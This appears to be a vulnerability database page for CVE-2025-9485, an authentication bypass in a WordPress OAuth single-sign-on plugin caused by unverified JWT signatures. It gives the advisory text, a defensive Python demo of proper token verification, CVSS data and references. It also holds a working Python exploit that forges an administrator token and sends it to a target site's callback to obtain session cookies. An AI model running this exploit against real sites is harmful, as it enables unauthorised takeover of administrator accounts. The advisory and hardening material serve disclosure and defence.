Security Vulnerability Report
CVE-2025-9485 CVSS 9.8 CRITICAL

Published: 2025-10-04 03:15:39
Last Modified: 2026-04-15 00:35:42

Description

The OAuth Single Sign On – SSO (OAuth Client) plugin for WordPress is vulnerable to Improper Verification of Cryptographic Signature in versions up to, and including, 6.26.12. This is due to the plugin performing unsafe JWT token processing without verification or validation in the `get_resource_owner_from_id_token` function. This makes it possible for unauthenticated attackers to bypass authentication and gain access to any existing user account - including administrators in certain configurations - or to create arbitrary subscriber-level accounts.
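The description boils down to one missing step: the plugin takes the `id_token` it receives, decodes the payload, and trusts the identity claims in it without ever checking the signature, so anyone who can construct a three-segment JWT can name the account they want to become. The example below is added here and is not the plugin's code nor part of this report; the plugin itself is PHP, and this Python only illustrates the check. It puts the unverified-decode pattern (assumed to mirror the flaw described for `get_resource_owner_from_id_token`) next to a hardened decode that allowlists the algorithm, verifies the signature in constant time, and checks `iss`, `aud` and `exp` before any claim is used. HS256 with a shared key is used so it runs on the standard library alone; a real OIDC `id_token` from a provider such as Google is RS256 and would be verified against the provider's published JWKS instead of a shared secret. The key, issuer, client id, clock value and all tokens are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed demo values (assumptions for this example, not from the plugin or any provider).
PROVIDER_KEY = b"demo-shared-secret-known-only-to-the-provider"
EXPECTED_ISS = "https://idp.example"
EXPECTED_AUD = "wp-client-id"
ALLOWED_ALGS = {"HS256"}   # never let the token's own "alg" pick the verification method
NOW = 1_700_000_000        # fixed clock so the demo is deterministic


def _b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(claims, key, alg="HS256"):
    """Build a JWT; used for the provider's genuine token and for attacker forgeries."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    if alg == "none":                     # unsigned token: empty signature segment
        return signing_input + "."
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def resource_owner_unverified(id_token):
    """Vulnerable pattern (assumed to mirror the described flaw): split the token,
    decode the payload and trust it. The signature segment is never examined."""
    _header, payload, _sig = id_token.split(".")
    return json.loads(_b64url_decode(payload))


def resource_owner_verified(id_token, key, now=None):
    """Hardened decode: allowlist alg, recompute the MAC over header.payload and
    compare in constant time, then check iss, aud and exp before returning claims."""
    parts = id_token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") not in ALLOWED_ALGS:
        raise ValueError(f"algorithm not allowed: {header.get('alg')!r}")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    if claims.get("iss") != EXPECTED_ISS:
        raise ValueError("unexpected issuer")
    aud = claims.get("aud")
    if aud != EXPECTED_AUD and not (isinstance(aud, list) and EXPECTED_AUD in aud):
        raise ValueError("token not issued for this client")
    now = int(time.time()) if now is None else now
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        raise ValueError("token expired or missing exp")
    if not claims.get("sub"):
        raise ValueError("missing sub")
    return claims


def rejection_reason(id_token, key, now=NOW):
    """None if the token verifies, otherwise the reason it was rejected."""
    try:
        resource_owner_verified(id_token, key, now)
        return None
    except ValueError as exc:
        return str(exc)


# Constructed tokens: one genuine, three that an attacker without the key could present.
GENUINE = mint_token({"iss": EXPECTED_ISS, "aud": EXPECTED_AUD, "sub": "user-42",
                      "email": "alice@example.org", "exp": NOW + 300}, PROVIDER_KEY)
ADMIN_CLAIMS = {"iss": EXPECTED_ISS, "aud": EXPECTED_AUD, "sub": "1",
                "email": "admin@example.org", "exp": NOW + 300}
FORGED = mint_token(ADMIN_CLAIMS, b"")                    # signed with an empty key
FORGED_NONE = mint_token(ADMIN_CLAIMS, b"", alg="none")  # "alg": "none", no signature
EXPIRED = mint_token(dict(ADMIN_CLAIMS, exp=NOW - 1), PROVIDER_KEY)  # real key, stale exp


def run_demo():
    """Unverified path accepts the forged admin token; verified path rejects every forgery."""
    return {
        "unverified_accepts_forged_admin": resource_owner_unverified(FORGED)["sub"] == "1",
        "verified_genuine_sub": resource_owner_verified(GENUINE, PROVIDER_KEY, NOW)["sub"],
        "forged": rejection_reason(FORGED, PROVIDER_KEY),
        "alg_none": rejection_reason(FORGED_NONE, PROVIDER_KEY),
        "expired": rejection_reason(EXPIRED, PROVIDER_KEY),
    }


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:<32} {outcome}")
```

The order of checks matters: the algorithm allowlist comes first so an `"alg": "none"` token is refused before any signature handling, the signature is verified before the payload is parsed into claims, and `iss`/`aud`/`exp` are checked before `sub` or `email` is returned to the caller, which is the point at which the vulnerable path would already have looked up or created a WordPress user.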

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
(Network attack vector, low complexity, no privileges or user interaction required, scope unchanged; high confidentiality, integrity and availability impact. Exploitability sub-score 3.9, impact sub-score 5.9. Weakness: CWE-347, Improper Verification of Cryptographic Signature.)

Configurations (Affected Products)

No NVD CPE configuration data available.

Affected product as reported by the CNA: the WordPress plugin miniorange-login-with-eve-online-google-facebook (OAuth Single Sign On – SSO (OAuth Client)), versions <= 6.26.12.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9485 PoC - WordPress OAuth SSO JWT Signature Verification Bypass
# This PoC demonstrates how to forge a JWT token to bypass authentication
import base64
import hashlib
import hmac
import json

import requests

TARGET_URL = "http://target-wordpress-site.com"


def base64url_encode(data):
    """Encode bytes to base64url without padding"""
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()


def forge_jwt(user_id, email, username, secret=""):
    """Forge a JWT token; the signature is computed with an attacker-chosen key
    (empty by default) because the vulnerable plugin never verifies it"""
    # JWT Header - using HS256 algorithm
    header = {"alg": "HS256", "typ": "JWT"}

    # JWT Payload - set user identity information
    payload = {
        "sub": str(user_id),                   # Subject (user identifier)
        "email": email,                        # User email
        "name": username,                      # Username
        "preferred_username": username,
        "iss": "https://accounts.google.com",  # Fake issuer
        "aud": "client_id_placeholder",
        "iat": 1700000000,
        "exp": 9999999999,                     # Far future expiration
    }

    # Encode header and payload
    header_b64 = base64url_encode(json.dumps(header, separators=(',', ':')).encode())
    payload_b64 = base64url_encode(json.dumps(payload, separators=(',', ':')).encode())

    # Create signature (plugin doesn't verify this properly)
    signing_input = f"{header_b64}.{payload_b64}"
    signature = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    signature_b64 = base64url_encode(signature)

    return f"{signing_input}.{signature_b64}"


def exploit(target_url, user_id=1, email="[email protected]", username="admin"):
    """Exploit the JWT verification bypass to gain unauthorized access"""
    # Step 1: Forge a malicious JWT token
    forged_token = forge_jwt(user_id, email, username)
    print(f"[+] Forged JWT token: {forged_token[:50]}...")

    # Step 2: Send the forged token to the OAuth callback endpoint
    callback_url = f"{target_url}/?option=mo_oauth_redirect"
    cookies = {"mo_oauth_token": forged_token}
    response = requests.get(callback_url, cookies=cookies, allow_redirects=False, timeout=15)

    if response.status_code == 302:
        # Step 3: Extract session cookies from redirect
        session_cookies = response.cookies
        print("[+] Authentication bypassed! Session cookies obtained:")
        for cookie in session_cookies:
            print(f"    {cookie.name} = {cookie.value}")
        return session_cookies

    print(f"[-] Exploitation failed. Status code: {response.status_code}")
    return None


if __name__ == "__main__":
    # Attempt to login as admin (user_id=1 is typically the first admin)
    exploit(TARGET_URL, user_id=1, email="[email protected]", username="admin")

References

https://plugins.trac.wordpress.org/browser/miniorange-login-with-eve-online-google-facebook/tags/6.26.12/class-mooauth-widget.php#L577 (class-mooauth-widget.php in affected version 6.26.12)
https://plugins.trac.wordpress.org/changeset/3360768/miniorange-login-with-eve-online-google-facebook (plugin changeset cited by the advisory)
https://www.wordfence.com/threat-intel/vulnerabilities/id/d2448afc-70d1-4dd5-b73b-62d182ee9a8a?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9485", "sourceIdentifier": "[email protected]", "published": "2025-10-04T03:15:38.780", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The OAuth Single Sign On – SSO (OAuth Client) plugin for WordPress is vulnerable to Improper Verification of Cryptographic Signature in versions up to, and including, 6.26.12. This is due to the plugin performing unsafe JWT token processing without verification or validation in the `get_resource_owner_from_id_token` function. This makes it possible for unauthenticated attackers to bypass authentication and gain access to any existing user account - including administrators in certain configurations - or to create arbitrary subscriber-level accounts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/miniorange-login-with-eve-online-google-facebook/tags/6.26.12/class-mooauth-widget.php#L577", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3360768/miniorange-login-with-eve-online-google-facebook", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d2448afc-70d1-4dd5-b73b-62d182ee9a8a?source=cve", "source": "[email protected]"}]}}